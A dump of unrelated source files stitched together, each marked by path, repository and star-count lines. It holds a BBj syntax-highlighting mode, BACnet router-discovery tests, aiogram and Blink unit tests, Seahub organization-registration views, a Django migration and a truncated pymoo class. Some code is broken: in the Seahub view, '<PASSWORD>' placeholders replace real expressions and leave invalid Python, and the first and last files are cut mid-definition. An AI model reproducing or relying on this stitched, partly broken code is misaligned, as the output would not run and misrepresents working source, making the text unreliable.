"bbj_main": bbj_main_attributes_dict,
}
# Keywords dict for bbj_main ruleset.
bbj_main_keywords_dict = {
"abs": "keyword1",
"addr": "keyword3",
"adjn": "keyword1",
"all": "keyword3",
"argc": "keyword1",
"argv": "keyword1",
"asc": "keyword1",
"ath": "keyword1",
"atn": "keyword1",
"auto": "keyword3",
"background": "keyword1",
"begin": "keyword3",
"bin": "keyword1",
"break": "keyword3",
"bsz": "keyword1",
"call": "keyword3",
"callback": "keyword1",
"case": "keyword3",
"chanopt": "keyword1",
"chdir": "keyword2",
"chn": "keyword3",
"chr": "keyword1",
"cisam": "keyword2",
"clear": "keyword3",
"clipclear": "keyword1",
"clipfromfile": "keyword1",
"clipfromstr": "keyword1",
"clipisformat": "keyword1",
"cliplock": "keyword1",
"clipregformat": "keyword1",
"cliptofile": "keyword1",
"cliptostr": "keyword1",
"clipunlock": "keyword1",
"close": "keyword2",
"continue": "keyword2",
"cos": "keyword1",
"cpl": "keyword1",
"crc": "keyword1",
"crc16": "keyword1",
"ctl": "keyword3",
"ctrl": "keyword1",
"cvs": "keyword1",
"cvt": "keyword1",
"data": "keyword3",
"date": "keyword1",
"day": "keyword3",
"dec": "keyword1",
"def": "keyword3",
"default": "keyword3",
"defend": "keyword3",
"delete": "keyword3",
"dim": "keyword3",
"dims": "keyword1",
"dir": "keyword2",
"direct": "keyword2",
"disable": "keyword2",
"dom": "keyword2",
"dread": "keyword3",
"drop": "keyword3",
"dsk": "keyword1",
"dsz": "keyword1",
"dump": "keyword2",
"edit": "keyword3",
"else": "keyword3",
"enable": "keyword2",
"end": "keyword2",
"endif": "keyword3",
"endtrace": "keyword2",
"enter": "keyword3",
"ept": "keyword1",
"erase": "keyword2",
"err": "keyword3",
"errmes": "keyword1",
"escape": "keyword3",
"escoff": "keyword3",
"escon": "keyword3",
"execute": "keyword3",
"exit": "keyword3",
"exitto": "keyword3",
"extract": "keyword2",
"fattr": "keyword1",
"fbin": "keyword1",
"fdec": "keyword1",
"fi": "keyword3",
"fid": "keyword2",
"field": "keyword1",
"file": "keyword2",
"fileopt": "keyword1",
"fill": "keyword1",
"fin": "keyword2",
"find": "keyword2",
"floatingpoint": "keyword1",
"for": "keyword3",
"fpt": "keyword1",
"from": "keyword2",
"gap": "keyword1",
"gosub": "keyword3",
"goto": "keyword3",
"hsa": "keyword1",
"hsh": "keyword1",
"hta": "keyword1",
"if": "keyword3",
"iff": "keyword3",
"imp": "keyword1",
"ind": "keyword2",
"indexed": "keyword2",
"info": "keyword1",
"initfile": "keyword3",
"input": "keyword2",
"inpute": "keyword2",
"inputn": "keyword2",
"int": "keyword1",
"iol": "keyword2",
"iolist": "keyword2",
"ior": "keyword3",
"jul": "keyword1",
"key": "keyword2",
"keyf": "keyword2",
"keyl": "keyword2",
"keyn": "keyword2",
"keyp": "keyword2",
"kgen": "keyword2",
"knum": "keyword2",
"lcheckin": "keyword1",
"lcheckout": "keyword1",
"len": "keyword1",
"let": "keyword3",
"linfo": "keyword1",
"list": "keyword2",
"load": "keyword2",
"lock": "keyword2",
"log": "keyword1",
"lrc": "keyword1",
"lst": "keyword1",
"mask": "keyword1",
"max": "keyword1",
"menuinfo": "keyword1",
"merge": "keyword2",
"min": "keyword1",
"mkdir": "keyword2",
"mkeyed": "keyword2",
"mod": "keyword1",
"msgbox": "keyword1",
"neval": "keyword1",
"next": "keyword3",
"nfield": "keyword1",
"not": "keyword3",
"notice": "keyword1",
"noticetpl": "keyword1",
"num": "keyword1",
"on": "keyword3",
"open": "keyword2",
"opts": "keyword3",
"or": "keyword3",
"pad": "keyword1",
"pck": "keyword1",
"pfx": "keyword3",
"pgm": "keyword1",
"pos": "keyword1",
"precision": "keyword3",
"prefix": "keyword2",
"print": "keyword2",
"process_events": "keyword1",
"program": "keyword1",
"psz": "keyword1",
"pub": "keyword1",
"read": "keyword2",
"read_resource": "keyword2",
"record": "keyword2",
"release": "keyword3",
"remove": "keyword2",
"remove_callback": "keyword1",
"rename": "keyword2",
"renum": "keyword3",
"repeat": "keyword3",
"resclose": "keyword2",
"reserve": "keyword1",
"reset": "keyword3",
"resfirst": "keyword2",
"resget": "keyword2",
"resinfo": "keyword2",
"resnext": "keyword2",
"resopen": "keyword2",
"restore": "keyword3",
"retry": "keyword3",
"return": "keyword3",
"rev": "keyword2",
"rmdir": "keyword2",
"rnd": "keyword1",
"round": "keyword1",
"run": "keyword3",
"save": "keyword2",
"scall": "keyword1",
"select": "keyword2",
"sendmsg": "keyword1",
"serial": "keyword2",
"set_case_sensitive_off": "keyword3",
"set_case_sensitive_on": "keyword3",
"setday": "keyword2",
"setdrive": "keyword2",
"seterr": "keyword3",
"setesc": "keyword3",
"setopts": "keyword3",
"settime": "keyword3",
"settrace": "keyword2",
"seval": "keyword1",
"sgn": "keyword1",
"sin": "keyword1",
"siz": "keyword2",
"sort": "keyword2",
"sqlchn": "keyword2",
"sqlclose": "keyword2",
"sqlerr": "keyword2",
"sqlexec": "keyword2",
"sqlfetch": "keyword2",
"sqllist": "keyword2",
"sqlopen": "keyword2",
"sqlprep": "keyword2",
"sqlset": "keyword2",
"sqltables": "keyword2",
"sqltmpl": "keyword2",
"sqlunt": "keyword2",
"sqr": "keyword1",
"ssn": "keyword3",
"ssort": "keyword1",
"ssz": "keyword1",
"start": "keyword3",
"stbl": "keyword1",
"step": "keyword3",
"stop": "keyword3",
"str": "keyword1",
"string": "keyword2",
"swap": "keyword1",
"swend": "keyword3",
"switch": "keyword3",
"sys": "keyword1",
"table": "keyword2",
"tbl": "keyword2",
"tcb": "keyword1",
"then": "keyword3",
"tim": "keyword2",
"tmpl": "keyword1",
"to": "keyword3",
"tsk": "keyword1",
"unlock": "keyword2",
"unt": "keyword3",
"until": "keyword3",
"upk": "keyword1",
"wait": "keyword3",
"wend": "keyword3",
"where": "keyword2",
"while": "keyword3",
"winfirst": "keyword1",
"wininfo": "keyword1",
"winnext": "keyword1",
"write": "keyword2",
"xfid": "keyword2",
"xfile": "keyword2",
"xfin": "keyword2",
"xor": "keyword3",
}
# Dictionary of keywords dictionaries for bbj mode.
keywordsDictDict = {
"bbj_main": bbj_main_keywords_dict,
}
# Rules for bbj_main ruleset.
def bbj_rule0(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="/*", end="*/",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def bbj_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def bbj_rule2(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="//",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def bbj_rule3(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment2", seq="REM",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def bbj_rule4(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule5(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule6(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule7(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule8(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule9(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule10(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule11(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule12(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule13(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<>",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="and",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="or",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def bbj_rule17(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="label", pattern=":",
at_line_start=True, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def bbj_rule18(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def bbj_rule19(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for bbj_main ruleset.
rulesDict1 = {
"\"": [bbj_rule1,],
"(": [bbj_rule18,],
"*": [bbj_rule10,],
"+": [bbj_rule7,],
"-": [bbj_rule8,],
"/": [bbj_rule0,bbj_rule2,bbj_rule9,],
"0": [bbj_rule19,],
"1": [bbj_rule19,],
"2": [bbj_rule19,],
"3": [bbj_rule19,],
"4": [bbj_rule19,],
"5": [bbj_rule19,],
"6": [bbj_rule19,],
"7": [bbj_rule19,],
"8": [bbj_rule19,],
"9": [bbj_rule19,],
":": [bbj_rule17,],
"<": [bbj_rule6,bbj_rule12,bbj_rule13,],
"=": [bbj_rule4,],
">": [bbj_rule5,bbj_rule11,],
"@": [bbj_rule19,],
"A": [bbj_rule19,],
"B": [bbj_rule19,],
"C": [bbj_rule19,],
"D": [bbj_rule19,],
"E": [bbj_rule19,],
"F": [bbj_rule19,],
"G": [bbj_rule19,],
"H": [bbj_rule19,],
"I": [bbj_rule19,],
"J": [bbj_rule19,],
"K": [bbj_rule19,],
"L": [bbj_rule19,],
"M": [bbj_rule19,],
"N": [bbj_rule19,],
"O": [bbj_rule19,],
"P": [bbj_rule19,],
"Q": [bbj_rule19,],
"R": [bbj_rule3,bbj_rule19,],
"S": [bbj_rule19,],
"T": [bbj_rule19,],
"U": [bbj_rule19,],
"V": [bbj_rule19,],
"W": [bbj_rule19,],
"X": [bbj_rule19,],
"Y": [bbj_rule19,],
"Z": [bbj_rule19,],
"^": [bbj_rule14,],
"_": [bbj_rule19,],
"a": [bbj_rule15,bbj_rule19,],
"b": [bbj_rule19,],
"c": [bbj_rule19,],
"d": [bbj_rule19,],
"e": [bbj_rule19,],
"f": [bbj_rule19,],
"g": [bbj_rule19,],
"h": [bbj_rule19,],
"i": [bbj_rule19,],
"j": [bbj_rule19,],
"k": [bbj_rule19,],
"l": [bbj_rule19,],
"m": [bbj_rule19,],
"n": [bbj_rule19,],
"o": [bbj_rule16,bbj_rule19,],
"p": [bbj_rule19,],
"q": [bbj_rule19,],
"r": [bbj_rule19,],
"s": [bbj_rule19,],
"t": [bbj_rule19,],
"u": [bbj_rule19,],
"v": [bbj_rule19,],
"w": [bbj_rule19,],
"x": [bbj_rule19,],
"y": [bbj_rule19,],
"z": [bbj_rule19,],
}
# x.rulesDictDict for bbj mode.
rulesDictDict = {
"bbj_main": rulesDict1,
}
# Import dict for bbj mode.
importDict = {}
|
tests/test_network/test_net_2.py
|
amih90/bacpypes
| 240 |
78929
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Network Discovery
----------------------
The TD is on network 1 with sniffer1, network 2 has sniffer2, network 3 has
sniffer3. Network 1 and 2 are connected with a router, network 2 and 3
are connected by a different router.
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, btox, xtob
from bacpypes.comm import Client, Server, bind
from bacpypes.pdu import PDU, Address, LocalBroadcast
from bacpypes.vlan import Network
from bacpypes.npdu import (
npdu_types, NPDU,
WhoIsRouterToNetwork, IAmRouterToNetwork, ICouldBeRouterToNetwork,
RejectMessageToNetwork, RouterBusyToNetwork, RouterAvailableToNetwork,
RoutingTableEntry, InitializeRoutingTable, InitializeRoutingTableAck,
EstablishConnectionToNetwork, DisconnectConnectionToNetwork,
WhatIsNetworkNumber, NetworkNumberIs,
)
from ..state_machine import match_pdu, StateMachineGroup, TrafficLog
from ..time_machine import reset_time_machine, run_time_machine
from .helpers import SnifferStateMachine, NetworkLayerStateMachine, RouterNode
# some debugging
_debug = 0
_log = ModuleLogger(globals())
#
# TNetwork
#
@bacpypes_debugging
class TNetwork(StateMachineGroup):
def __init__(self):
if _debug: TNetwork._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.td)
# sniffer node
self.sniffer1 = SnifferStateMachine("2", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("3", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# sniffer node
self.sniffer2 = SnifferStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, 2)
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = SnifferStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
def run(self, time_limit=60.0):
if _debug: TNetwork._debug("run %r", time_limit)
# run the group
super(TNetwork, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork._debug(" %s %s", direction, str(pdu))
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork._debug)
# check for success
all_success, some_failed = super(TNetwork, self).check_for_success()
assert all_success
@bacpypes_debugging
class TestSimple(unittest.TestCase):
def test_idle(self):
"""Test an idle network, nothing happens is success."""
if _debug: TestSimple._debug("test_idle")
# create a network
tnet = TNetwork()
# all start states are successful
tnet.td.start_state.success()
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
@bacpypes_debugging
class TestWhoIsRouterToNetwork(unittest.TestCase):
def test_01(self):
"""Test broadcast for any router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_01")
# create a network
tnet = TNetwork()
# test device sends request, sees response
tnet.td.start_state.doc("1-1-0") \
.send(WhoIsRouterToNetwork(
destination=LocalBroadcast(),
)).doc("1-1-1") \
.receive(IAmRouterToNetwork,
iartnNetworkList=[2],
).doc("1-1-2") \
.success()
# sniffer on network 1 sees the request and the response
tnet.sniffer1.start_state.doc("1-2-0") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'00' # message type, no network
)
).doc("1-2-1") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'01 0002' # message type and network list
)
).doc("1-2-2") \
.success()
# nothing received on network 2
tnet.sniffer2.start_state.doc("1-3-0") \
.timeout(3).doc("1-3-1") \
.success()
# nothing received on network 3
tnet.sniffer3.start_state.doc("1-4-0") \
.timeout(3).doc("1-4-1") \
.success()
# run the group
tnet.run()
def test_02(self):
"""Test broadcast for existing router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_02")
# create a network
tnet = TNetwork()
# test device sends request, receives response
tnet.td.start_state.doc("2-1-0") \
.send(WhoIsRouterToNetwork(2,
destination=LocalBroadcast(),
)).doc("2-1-1") \
.receive(IAmRouterToNetwork,
iartnNetworkList=[2],
).doc("2-1-2") \
.success()
tnet.sniffer1.start_state.success()
# nothing received on network 2
tnet.sniffer2.start_state.doc("2-2-0") \
.timeout(3).doc("2-2-1") \
.success()
# nothing received on network 3
tnet.sniffer3.start_state.doc("2-3-0") \
.timeout(3).doc("2-3-1") \
.success()
# run the group
tnet.run()
def test_03(self):
"""Test broadcast for a non-existent router."""
if _debug: TestWhoIsRouterToNetwork._debug("test_03")
# create a network
tnet = TNetwork()
# send request, receive nothing back
tnet.td.start_state.doc("3-1-0") \
.send(WhoIsRouterToNetwork(4,
destination=LocalBroadcast(),
)).doc("3-1-1") \
.timeout(3).doc("3-1-2") \
.success()
# sniffer on network 1 sees the request
tnet.sniffer1.start_state.doc("3-2-0") \
.receive(PDU,
pduData=xtob('01.80' # version, network layer
'00 0004' # message type and network
)
).doc("3-2-1") \
.success()
# sniffer on network 2 sees request forwarded by router
tnet.sniffer2.start_state.doc("3-3-0") \
.receive(PDU,
pduData=xtob('01.88' # version, network layer, routed
'0001 01 01' # snet/slen/sadr
'00 0004' # message type and network
),
).doc("3-3-1") \
.success()
tnet.sniffer3.start_state.doc("3-4-0") \
.receive(PDU,
pduData=xtob('01.88' # version, network layer, routed
'0001 01 01' # snet/slen/sadr
'00 0004' # message type and network
),
).doc("3-4-1") \
.success()
# run the group
tnet.run()
|
tests/types/test_photo.py
|
andrew-ld/aiogram
| 2,744 |
78935
|
from aiogram import types
from .dataset import PHOTO
photo = types.PhotoSize(**PHOTO)
def test_export():
exported = photo.to_python()
assert isinstance(exported, dict)
assert exported == PHOTO
def test_file_id():
assert isinstance(photo.file_id, str)
assert photo.file_id == PHOTO['file_id']
def test_file_size():
assert isinstance(photo.file_size, int)
assert photo.file_size == PHOTO['file_size']
def test_size():
assert isinstance(photo.width, int)
assert isinstance(photo.height, int)
assert photo.width == PHOTO['width']
assert photo.height == PHOTO['height']
|
doc/workshop/advancedReliability/inputs/goalFunction.py
|
rinelson456/raven
| 159 |
78937
|
<reponame>rinelson456/raven
def __residuumSign(self):
if self.outcome == 0:
return -1
else: return 1
|
seahub/organizations/views.py
|
samuelduann/seahub
| 420 |
78980
|
# Copyright (c) 2012-2016 Seafile Ltd.
# encoding: utf-8
import logging
import json
from urllib.parse import urlparse
from django.conf import settings
from django.contrib import messages
from django.urls import reverse
from django.core.cache import cache
from django.utils.translation import ugettext_lazy as _
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render
from django.utils.crypto import get_random_string
import seaserv
from seaserv import ccnet_api
from seahub.auth import login
from seahub.auth.decorators import login_required, login_required_ajax
from seahub.base.accounts import User
from seahub.group.views import remove_group_common
from seahub.profile.models import Profile
from seahub.utils import get_service_url, render_error
from seahub.utils.auth import get_login_bg_image_path
from seahub.organizations.signals import org_created
from seahub.organizations.decorators import org_staff_required
from seahub.organizations.forms import OrgRegistrationForm
from seahub.organizations.settings import ORG_AUTO_URL_PREFIX, \
ORG_MEMBER_QUOTA_ENABLED, ORG_ENABLE_ADMIN_INVITE_USER
from seahub.organizations.utils import get_or_create_invitation_link
# Get an instance of a logger
logger = logging.getLogger(__name__)
########## ccnet rpc wrapper
def create_org(org_name, url_prefix, creator):
return seaserv.create_org(org_name, url_prefix, creator)
def count_orgs():
return seaserv.ccnet_threaded_rpc.count_orgs()
def get_org_by_url_prefix(url_prefix):
return seaserv.ccnet_threaded_rpc.get_org_by_url_prefix(url_prefix)
def set_org_user(org_id, username, is_staff=False):
return seaserv.ccnet_threaded_rpc.add_org_user(org_id, username,
int(is_staff))
def unset_org_user(org_id, username):
return seaserv.ccnet_threaded_rpc.remove_org_user(org_id, username)
def org_user_exists(org_id, username):
return seaserv.ccnet_threaded_rpc.org_user_exists(org_id, username)
def get_org_groups(org_id, start, limit):
return seaserv.ccnet_threaded_rpc.get_org_groups(org_id, start, limit)
def get_org_id_by_group(group_id):
return seaserv.ccnet_threaded_rpc.get_org_id_by_group(group_id)
def remove_org_group(org_id, group_id, username):
remove_group_common(group_id, username)
seaserv.ccnet_threaded_rpc.remove_org_group(org_id, group_id)
def is_org_staff(org_id, username):
return seaserv.ccnet_threaded_rpc.is_org_staff(org_id, username)
def set_org_staff(org_id, username):
return seaserv.ccnet_threaded_rpc.set_org_staff(org_id, username)
def unset_org_staff(org_id, username):
return seaserv.ccnet_threaded_rpc.unset_org_staff(org_id, username)
########## seafile rpc wrapper
def get_org_user_self_usage(org_id, username):
"""
Arguments:
- `org_id`:
- `username`:
"""
return seaserv.seafserv_threaded_rpc.get_org_user_quota_usage(org_id, username)
def get_org_user_quota(org_id, username):
return seaserv.seafserv_threaded_rpc.get_org_user_quota(org_id, username)
def get_org_quota(org_id):
return seaserv.seafserv_threaded_rpc.get_org_quota(org_id)
def is_org_repo(org_id, repo_id):
return True if seaserv.seafserv_threaded_rpc.get_org_id_by_repo_id(
repo_id) == org_id else False
########## views
@login_required_ajax
def org_add(request):
"""Handle ajax request to add org, and create org owner.
Arguments:
- `request`:
"""
if not request.user.is_staff or request.method != 'POST':
raise Http404
content_type = 'application/json; charset=utf-8'
url_prefix = gen_org_url_prefix(3)
post_data = request.POST.copy()
post_data['url_prefix'] = url_prefix
form = OrgRegistrationForm(post_data)
if form.is_valid():
email = form.cleaned_data['email']
password = <PASSWORD>.cleaned_data['<PASSWORD>']
org_name = form.cleaned_data['org_name']
url_prefix = form.cleaned_data['url_prefix']
try:
new_user = User.objects.create_user(email, password,
is_staff=False, is_active=True)
except User.DoesNotExist as e:
logger.error(e)
err_msg = 'Fail to create organization owner %s.' % email
return HttpResponse(json.dumps({'error': err_msg}),
status=403, content_type=content_type)
create_org(org_name, url_prefix, new_user.username)
return HttpResponse(json.dumps({'success': True}),
content_type=content_type)
else:
try:
err_msg = list(form.errors.values())[0][0]
except IndexError:
err_msg = list(form.errors.values())[0]
return HttpResponse(json.dumps({'error': str(err_msg)}),
status=400, content_type=content_type)
def gen_org_url_prefix(max_trial=None):
"""Generate organization url prefix automatically.
If ``max_trial`` is large than 0, then re-try that times if failed.
Arguments:
- `max_trial`:
Returns:
Url prefix if succed, otherwise, ``None``.
"""
def _gen_prefix():
url_prefix = 'org_' + get_random_string(
6, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789')
if get_org_by_url_prefix(url_prefix) is not None:
logger.info("org url prefix, %s is duplicated" % url_prefix)
return None
else:
return url_prefix
try:
max_trial = int(max_trial)
except (TypeError, ValueError):
max_trial = 0
while max_trial >= 0:
ret = _gen_prefix()
if ret is not None:
return ret
else:
max_trial -= 1
logger.warning("Failed to generate org url prefix, retry: %d" % max_trial)
return None
def org_register(request):
"""Allow a new user to register an organization account. A new
organization will be created associate with that user.
Arguments:
- `request`:
"""
login_bg_image_path = get_login_bg_image_path()
if request.method == 'POST':
form = OrgRegistrationForm(request.POST)
if ORG_AUTO_URL_PREFIX:
# generate url prefix automatically
url_prefix = gen_org_url_prefix(3)
if url_prefix is None:
messages.error(request, "Failed to create organization account, please try again later.")
return render(request, 'organizations/org_register.html', {
'form': form,
'login_bg_image_path': login_bg_image_path,
'org_auto_url_prefix': ORG_AUTO_URL_PREFIX,
})
post_data = request.POST.copy()
post_data['url_prefix'] = url_prefix
form = OrgRegistrationForm(post_data)
if form.is_valid():
name = form.cleaned_data['name']
email = form.cleaned_data['email']
password = form.cleaned_data['<PASSWORD>']
org_name = form.cleaned_data['org_name']
url_prefix = form.cleaned_data['url_prefix']
new_user = User.objects.create_user(email, password,
is_staff=False, is_active=True)
create_org(org_name, url_prefix, new_user.username)
new_org = get_org_by_url_prefix(url_prefix)
org_created.send(sender=None, org=new_org)
if name:
Profile.objects.add_or_update(new_user.username, name)
# login the user
new_user.backend = settings.AUTHENTICATION_BACKENDS[0]
login(request, new_user)
return HttpResponseRedirect(reverse('libraries'))
else:
form = OrgRegistrationForm()
service_url = get_service_url()
up = urlparse(service_url)
service_url_scheme = up.scheme
service_url_remaining = up.netloc + up.path
return render(request, 'organizations/org_register.html', {
'form': form,
'login_bg_image_path': login_bg_image_path,
'service_url_scheme': service_url_scheme,
'service_url_remaining': service_url_remaining,
'org_auto_url_prefix': ORG_AUTO_URL_PREFIX,
})
@login_required
@org_staff_required
def react_fake_view(request, **kwargs):
group_id = kwargs.get('group_id', '')
org = request.user.org
invitation_link = get_or_create_invitation_link(org.org_id) if ORG_ENABLE_ADMIN_INVITE_USER else ''
# Whether use new page
return render(request, "organizations/org_admin_react.html", {
'org': org,
'org_member_quota_enabled': ORG_MEMBER_QUOTA_ENABLED,
'group_id': group_id,
'invitation_link': invitation_link,
})
@login_required
def org_associate(request, token):
"""Associate user with coresponding org.
Mainly used for new WeChat user on doc.seafile.com.
"""
username = request.user.username
# validate token
org_id = cache.get('org_associate_%s' % token, -1)
if org_id <= 0:
return render_error(request, _('Invalid token.'))
# get org info
org = ccnet_api.get_org_by_id(org_id)
if not org:
return render_error(request, 'Invalid org id')
# Log user in if he/she already belongs to any orgs.
orgs = ccnet_api.get_orgs_by_user(username)
if orgs:
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
# check org member quota
if ORG_MEMBER_QUOTA_ENABLED:
from seahub.organizations.models import OrgMemberQuota
org_members = len(ccnet_api.get_org_users_by_url_prefix(org.url_prefix,
-1, -1))
org_members_quota = OrgMemberQuota.objects.get_quota(org_id)
if org_members_quota is not None and org_members >= org_members_quota:
return render_error(request, 'Above quota')
set_org_user(org_id, username)
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL)
|
core/migrations/0012_auto_20200813_0238.py
|
Gitoffomalawn/babybuddy
| 922 |
79020
|
# Generated by Django 3.1 on 2020-08-13 02:38
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
("core", "0011_auto_20200214_1939"),
]
operations = [
migrations.AlterField(
model_name="note",
name="time",
field=models.DateTimeField(
default=django.utils.timezone.now, verbose_name="Time"
),
),
]
|
third_party/blink/tools/blinkpy/web_tests/layout_package/json_results_generator_unittest.py
|
zealoussnow/chromium
| 14,668 |
79021
|
<filename>third_party/blink/tools/blinkpy/web_tests/layout_package/json_results_generator_unittest.py
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import unittest
from blinkpy.web_tests.layout_package import json_results_generator
class JSONGeneratorTest(unittest.TestCase):
def setUp(self):
self.builder_name = 'DUMMY_BUILDER_NAME'
self.build_number = 'DUMMY_BUILDER_NUMBER'
# For archived results.
self._json = None
self._num_runs = 0
self._tests_set = set([])
self._test_timings = {}
self._failed_count_map = {}
self._PASS_count = 0
self._DISABLED_count = 0
self._FLAKY_count = 0
self._FAILS_count = 0
self._fixable_count = 0
def test_strip_json_wrapper(self):
json = "['contents']"
self.assertEqual(
json_results_generator.
strip_json_wrapper(json_results_generator._JSON_PREFIX + json +
json_results_generator._JSON_SUFFIX), json)
self.assertEqual(json_results_generator.strip_json_wrapper(json), json)
def test_test_timings_trie(self):
individual_test_timings = []
individual_test_timings.append(
json_results_generator.TestResult(
'foo/bar/baz.html', elapsed_time=1.2))
individual_test_timings.append(
json_results_generator.TestResult('bar.html', elapsed_time=0.0001))
trie = json_results_generator.test_timings_trie(
individual_test_timings)
expected_trie = {
'bar.html': 0,
'foo': {
'bar': {
'baz.html': 1200,
}
}
}
self.assertEqual(json.dumps(trie), json.dumps(expected_trie))
|
pymoo/core/survival.py
|
jarreguit/pymoo
| 762 |
79025
|
from abc import abstractmethod
import numpy as np
from pymoo.core.population import Population
# ---------------------------------------------------------------------------------------------------------
# Survival
# ---------------------------------------------------------------------------------------------------------
class Survival:
def __init__(self, filter_infeasible=True):
super().__init__()
